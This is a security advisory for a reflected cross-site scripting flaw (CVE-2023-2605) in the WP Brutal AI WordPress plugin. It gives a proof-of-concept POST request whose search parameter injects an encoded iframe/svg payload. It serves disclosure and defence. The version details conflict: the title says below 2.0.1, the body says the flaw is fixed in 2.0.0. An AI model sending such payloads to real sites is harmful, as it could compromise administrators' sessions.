WordPress WP Brutal AI Cross Site Scripting

Tittle:WordPress Plugin WP Brutal AI < 2.0.1 - Admin + Reflected XSSReferences:CVE-2023-2605Author:Taurus Omar Description:The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against a logged in high privilege users such as admin.Affects Plugins:WP Brutal AI- Fixed in version 2.0.0Proof of Concept:Send an HTTP request with the following:```POST https://example.com/wp-admin/admin.php?page=viewwpbrutalaicampaign&id=1 HTTP/1.1Content-Type: application/x-www-form-urlencodedContent-Length: 86Cookie: [Admin+]search=%22%3E%27%3E%3Ciframe+src%3D%22%3Csvg+onload%3Dalert%281%29%3B%3E%22%3E&status=```Classification:Type XSS OWASP top 10 A7: Cross-Site Scripting (XSS)CWE-79wpScan:https://wpscan.com/vulnerability/372cb940-71ba-4d19-b35a-ab15f8c2fdeb